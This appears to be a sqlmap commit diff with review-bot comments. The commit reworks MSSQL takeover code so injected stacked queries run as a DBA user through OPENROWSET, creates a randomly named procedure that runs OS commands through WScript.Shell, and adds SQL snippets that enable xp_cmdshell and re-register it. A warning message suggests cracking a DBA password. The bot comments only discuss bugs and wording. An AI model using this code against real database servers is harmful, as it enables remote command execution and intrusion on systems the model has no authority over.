	more tweaking for issue #34, it's totally not as trivial as it may look (OPENROWSET has many limitations on MSSQL >= 2005)
This commit is contained in:
		
							parent
							
								
									b7d2680e55
								
							
						
					
					
						commit
						04d803c7fd
					
				|  | @ -11,6 +11,7 @@ from xml.etree import ElementTree as ET | ||||||
| 
 | 
 | ||||||
| from lib.core.common import Backend | from lib.core.common import Backend | ||||||
| from lib.core.common import extractRegexResult | from lib.core.common import extractRegexResult | ||||||
|  | from lib.core.common import getSPQLSnippet | ||||||
| from lib.core.common import isDBMSVersionAtLeast | from lib.core.common import isDBMSVersionAtLeast | ||||||
| from lib.core.common import isTechniqueAvailable | from lib.core.common import isTechniqueAvailable | ||||||
| from lib.core.common import randomInt | from lib.core.common import randomInt | ||||||
|  | @ -27,6 +28,7 @@ from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR | ||||||
| from lib.core.settings import FROM_DUMMY_TABLE | from lib.core.settings import FROM_DUMMY_TABLE | ||||||
| from lib.core.settings import GENERIC_SQL_COMMENT | from lib.core.settings import GENERIC_SQL_COMMENT | ||||||
| from lib.core.settings import PAYLOAD_DELIMITER | from lib.core.settings import PAYLOAD_DELIMITER | ||||||
|  | from lib.core.settings import SQL_STATEMENTS | ||||||
| from lib.core.unescaper import unescaper | from lib.core.unescaper import unescaper | ||||||
| 
 | 
 | ||||||
| class Agent: | class Agent: | ||||||
|  | @ -816,5 +818,20 @@ class Agent: | ||||||
| 
 | 
 | ||||||
|         return re.sub("(%s.*?%s)" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), "%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER), inpStr) if inpStr else inpStr |         return re.sub("(%s.*?%s)" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), "%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER), inpStr) if inpStr else inpStr | ||||||
| 
 | 
 | ||||||
|  |     def runAsDBMSUser(self, query): | ||||||
|  |         if conf.dCred and "Ad Hoc Distributed Queries" not in query: | ||||||
|  |             for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): | ||||||
|  |                 for sqlStatement in sqlStatements: | ||||||
|  |                     if query.lower().startswith(sqlStatement): | ||||||
|  |                         sqlType = sqlTitle | ||||||
|  |                         break | ||||||
|  | 
 | ||||||
|  |             if sqlType and "SELECT" not in sqlType: | ||||||
|  |                 query = "SELECT %d;%s" % (randomInt(), query) | ||||||
|  | 
 | ||||||
|  |             query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''")) | ||||||
|  | 
 | ||||||
|  |         return query | ||||||
|  | 
 | ||||||
| # SQL agent | # SQL agent | ||||||
| agent = Agent() | agent = Agent() | ||||||
|  |  | ||||||
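Review bot: `sqlType` is only bound when one of the `SQL_STATEMENTS` prefixes matches, so a query matching none of them raises UnboundLocalError at `if sqlType and "SELECT" not in sqlType:` — the same latent defect the removed copy in the second file had; add `sqlType = None` directly after the `if conf.dCred and "Ad Hoc Distributed Queries" not in query:` line, before the outer `for`. The `break` only leaves the inner loop, so a later title can overwrite an earlier match; a `for ... else` on the outer loop would make the first match stick. Only STATEMENT is escaped with `.replace("'", "''")`, while `USER=conf.dbmsUsername` and `PASSWORD=conf.dbmsPassword` are substituted verbatim into the single-quoted OPENROWSET snippet, so a credential containing `'` produces a broken statement; escape both the same way. The method ends inside the hunk, but `class Agent` starts outside it.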
|  | @ -10,13 +10,13 @@ from lib.core.common import dataToStdout | ||||||
| from lib.core.common import Backend | from lib.core.common import Backend | ||||||
| from lib.core.common import getSPQLSnippet | from lib.core.common import getSPQLSnippet | ||||||
| from lib.core.common import isTechniqueAvailable | from lib.core.common import isTechniqueAvailable | ||||||
|  | from lib.core.common import randomInt | ||||||
| from lib.core.common import readInput | from lib.core.common import readInput | ||||||
| from lib.core.data import conf | from lib.core.data import conf | ||||||
| from lib.core.data import logger | from lib.core.data import logger | ||||||
| from lib.core.enums import DBMS | from lib.core.enums import DBMS | ||||||
| from lib.core.enums import PAYLOAD | from lib.core.enums import PAYLOAD | ||||||
| from lib.core.exception import sqlmapUnsupportedFeatureException | from lib.core.exception import sqlmapUnsupportedFeatureException | ||||||
| from lib.core.settings import SQL_STATEMENTS |  | ||||||
| from lib.core.shell import autoCompletion | from lib.core.shell import autoCompletion | ||||||
| from lib.request import inject | from lib.request import inject | ||||||
| from lib.takeover.udf import UDF | from lib.takeover.udf import UDF | ||||||
|  | @ -38,21 +38,6 @@ class Abstraction(Web, UDF, xp_cmdshell): | ||||||
|         Web.__init__(self) |         Web.__init__(self) | ||||||
|         xp_cmdshell.__init__(self) |         xp_cmdshell.__init__(self) | ||||||
| 
 | 
 | ||||||
|     def runAsDBMSUser(self, query): |  | ||||||
|         if conf.dCred: |  | ||||||
|             for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): |  | ||||||
|                 for sqlStatement in sqlStatements: |  | ||||||
|                     if query.lower().startswith(sqlStatement): |  | ||||||
|                         sqlType = sqlTitle |  | ||||||
|                         break |  | ||||||
| 
 |  | ||||||
|             if sqlType and "SELECT" not in sqlType: |  | ||||||
|                 query = "SELECT 1;%s" % query |  | ||||||
| 
 |  | ||||||
|             query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''")) |  | ||||||
| 
 |  | ||||||
|         return query |  | ||||||
| 
 |  | ||||||
|     def execCmd(self, cmd, silent=False): |     def execCmd(self, cmd, silent=False): | ||||||
|         if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): |         if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): | ||||||
|             self.webBackdoorRunCmd(cmd) |             self.webBackdoorRunCmd(cmd) | ||||||
|  | @ -201,6 +186,13 @@ class Abstraction(Web, UDF, xp_cmdshell): | ||||||
|             if mandatory and not self.isDba(): |             if mandatory and not self.isDba(): | ||||||
|                 warnMsg = "the functionality requested might not work because " |                 warnMsg = "the functionality requested might not work because " | ||||||
|                 warnMsg += "the session user is not a database administrator" |                 warnMsg += "the session user is not a database administrator" | ||||||
|  | 
 | ||||||
|  |                 if not conf.dCred and Backend.getIdentifiedDbms() in ( DBMS.MSSQL, DBMS.PGSQL ): | ||||||
|  |                     warnMsg += ". You can try to provide --dbms-cred switch " | ||||||
|  |                     warnMsg += "to execute statements as a DBA user if you " | ||||||
|  |                     warnMsg += "were able to extract and crack a DBA " | ||||||
|  |                     warnMsg += "password by any mean" | ||||||
|  | 
 | ||||||
|                 logger.warn(warnMsg) |                 logger.warn(warnMsg) | ||||||
| 
 | 
 | ||||||
|             if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ): |             if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ): | ||||||
|  |  | ||||||
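Review bot: The hint added at `if not conf.dCred and Backend.getIdentifiedDbms() in ( DBMS.MSSQL, DBMS.PGSQL ):` advertises `--dbms-cred` for PostgreSQL, but the only consumer visible in this commit, `Agent.runAsDBMSUser`, wraps the statement in the `DBMS.MSSQL` `run_statement_as_user` snippet whenever `conf.dCred` is set, regardless of the identified DBMS; either drop `DBMS.PGSQL` from the tuple or confirm that a PostgreSQL path exists elsewhere. The user-facing wording `"password by any mean"` should read `"password by any means"`. The `from lib.core.common import randomInt` import added at the top of this file has no use in the visible hunks (the removed method used a literal `SELECT 1`), so it may be dead now that the method has moved. The enclosing method of this hunk starts and ends outside it.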
|  | @ -5,6 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://www.sqlmap.org/) | ||||||
| See the file 'doc/COPYING' for copying permission | See the file 'doc/COPYING' for copying permission | ||||||
| """ | """ | ||||||
| 
 | 
 | ||||||
|  | from lib.core.agent import agent | ||||||
| from lib.core.common import Backend | from lib.core.common import Backend | ||||||
| from lib.core.common import getSPQLSnippet | from lib.core.common import getSPQLSnippet | ||||||
| from lib.core.common import hashDBWrite | from lib.core.common import hashDBWrite | ||||||
|  | @ -43,23 +44,25 @@ class xp_cmdshell: | ||||||
|             cmd += "EXEC master..sp_configure 'show advanced options',1;" |             cmd += "EXEC master..sp_configure 'show advanced options',1;" | ||||||
|             cmd += "RECONFIGURE WITH OVERRIDE;" |             cmd += "RECONFIGURE WITH OVERRIDE;" | ||||||
|             cmd += "EXEC master..sp_configure 'ole automation procedures',1;" |             cmd += "EXEC master..sp_configure 'ole automation procedures',1;" | ||||||
|             cmd += "RECONFIGURE WITH OVERRIDE; " |             cmd += "RECONFIGURE WITH OVERRIDE" | ||||||
|             inject.goStacked(cmd) |             inject.goStacked(agent.runAsDBMSUser(cmd)) | ||||||
| 
 | 
 | ||||||
|         self.__randStr = randomStr(lowercase=True) |         self.__randStr = randomStr(lowercase=True) | ||||||
|  |         self.__xpCmdshellNew = randomStr(lowercase=True) | ||||||
|  |         self.xpCmdshellStr = "master..xp_%s" % self.__xpCmdshellNew | ||||||
| 
 | 
 | ||||||
|         cmd += "DECLARE @%s nvarchar(999); " % self.__randStr |         cmd = "DECLARE @%s nvarchar(999);" % self.__randStr | ||||||
|         cmd += "set @%s='" % self.__randStr |         cmd += "set @%s='" % self.__randStr | ||||||
|         cmd += "CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int " |         cmd += "CREATE PROCEDURE xp_%s(@cmd varchar(255)) AS DECLARE @ID int " % self.__xpCmdshellNew | ||||||
|         cmd += "EXEC sp_OACreate ''WScript.Shell'',@ID OUT " |         cmd += "EXEC sp_OACreate ''WScript.Shell'',@ID OUT " | ||||||
|         cmd += "EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 " |         cmd += "EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 " | ||||||
|         cmd += "EXEC sp_OADestroy @ID';" |         cmd += "EXEC sp_OADestroy @ID';" | ||||||
|         cmd += "EXEC master..sp_executesql @%s;" % self.__randStr |         cmd += "EXEC master..sp_executesql @%s" % self.__randStr | ||||||
| 
 | 
 | ||||||
|         if Backend.isVersionWithin(("2005", "2008")): |         if Backend.isVersionWithin(("2005", "2008")): | ||||||
|             cmd += " RECONFIGURE WITH OVERRIDE;" |             cmd += ";RECONFIGURE WITH OVERRIDE" | ||||||
| 
 | 
 | ||||||
|         inject.goStacked(cmd) |         inject.goStacked(agent.runAsDBMSUser(cmd)) | ||||||
| 
 | 
 | ||||||
|     def __xpCmdshellConfigure2005(self, mode): |     def __xpCmdshellConfigure2005(self, mode): | ||||||
|         debugMsg = "configuring xp_cmdshell using sp_configure " |         debugMsg = "configuring xp_cmdshell using sp_configure " | ||||||
|  | @ -88,7 +91,7 @@ class xp_cmdshell: | ||||||
|         else: |         else: | ||||||
|             cmd = self.__xpCmdshellConfigure2000(mode) |             cmd = self.__xpCmdshellConfigure2000(mode) | ||||||
| 
 | 
 | ||||||
|         inject.goStacked(cmd) |         inject.goStacked(agent.runAsDBMSUser(cmd)) | ||||||
| 
 | 
 | ||||||
|     def __xpCmdshellCheck(self): |     def __xpCmdshellCheck(self): | ||||||
|         cmd = "ping -n %d 127.0.0.1" % (conf.timeSec * 2) |         cmd = "ping -n %d 127.0.0.1" % (conf.timeSec * 2) | ||||||
|  | @ -153,7 +156,7 @@ class xp_cmdshell: | ||||||
|         self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd) |         self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd) | ||||||
|         self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr) |         self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr) | ||||||
| 
 | 
 | ||||||
|         return self.runAsDBMSUser(self.__forgedCmd) |         return agent.runAsDBMSUser(self.__forgedCmd) | ||||||
| 
 | 
 | ||||||
|     def xpCmdshellExecCmd(self, cmd, silent=False): |     def xpCmdshellExecCmd(self, cmd, silent=False): | ||||||
|         cmd = self.xpCmdshellForgeCmd(cmd) |         cmd = self.xpCmdshellForgeCmd(cmd) | ||||||
|  |  | ||||||
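Review bot: The renamed procedure and the dropped trailing semicolons need a comment, because nothing in the hunk explains why `CREATE PROCEDURE xp_%s(@cmd varchar(255))` now uses a random name or why `RECONFIGURE WITH OVERRIDE` and `EXEC master..sp_executesql @%s` lost their `;`. Above `self.__xpCmdshellNew = randomStr(lowercase=True)` I would add `# procedure is created under a random name; xpCmdshellStr is re-pointed so later EXEC calls use it`, and above the first `inject.goStacked(agent.runAsDBMSUser(cmd))` a line such as `# no trailing ';' here: with --dbms-cred the whole batch is embedded as an OPENROWSET query string (see commit message)`, since the wrapper's behaviour is only implied by the commit title. Note also that `cmd = "DECLARE @%s nvarchar(999);"` (previously `+=`) deliberately starts a fresh batch after the earlier one was already sent via `inject.goStacked`; that is worth a comment too. The enclosing method starts outside the hunk.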
|  | @ -3,4 +3,4 @@ RECONFIGURE WITH OVERRIDE; | ||||||
| EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%; | EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%; | ||||||
| RECONFIGURE WITH OVERRIDE; | RECONFIGURE WITH OVERRIDE; | ||||||
| EXEC sp_configure 'show advanced options', 0; | EXEC sp_configure 'show advanced options', 0; | ||||||
| RECONFIGURE WITH OVERRIDE; | RECONFIGURE WITH OVERRIDE | ||||||
|  |  | ||||||
|  | @ -3,4 +3,4 @@ RECONFIGURE WITH OVERRIDE; | ||||||
| EXEC master..sp_configure 'xp_cmdshell',%ENABLE%; | EXEC master..sp_configure 'xp_cmdshell',%ENABLE%; | ||||||
| RECONFIGURE WITH OVERRIDE; | RECONFIGURE WITH OVERRIDE; | ||||||
| EXEC sp_configure 'show advanced options',0; | EXEC sp_configure 'show advanced options',0; | ||||||
| RECONFIGURE WITH OVERRIDE; | RECONFIGURE WITH OVERRIDE | ||||||
|  |  | ||||||
|  | @ -1 +1 @@ | ||||||
| EXEC master..sp_dropextendedproc 'xp_cmdshell'; | EXEC master..sp_dropextendedproc 'xp_cmdshell' | ||||||
|  |  | ||||||
|  | @ -1 +1 @@ | ||||||
| EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll'; | EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll' | ||||||
|  |  | ||||||
|  | @ -1 +1,2 @@ | ||||||
| SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%'); | SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%') | ||||||
|  | # SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','%STATEMENT%') | ||||||
|  |  | ||||||
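Review bot: The added `# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;...` line uses `#`, which T-SQL does not treat as a comment marker (`--` does), so unless `getSPQLSnippet` strips `#`-prefixed lines before substitution (not visible here) the snippet now ships both lines and the second, with its empty `Address=`, breaks the statement; either change the prefix to `-- ` or confirm the loader filters it. Since the snippet substitutes `%USER%`, `%PASSWORD%` and `%STATEMENT%` into single-quoted literals, a `--` comment stating that callers must double any embedded `'` before substitution would also help the next maintainer.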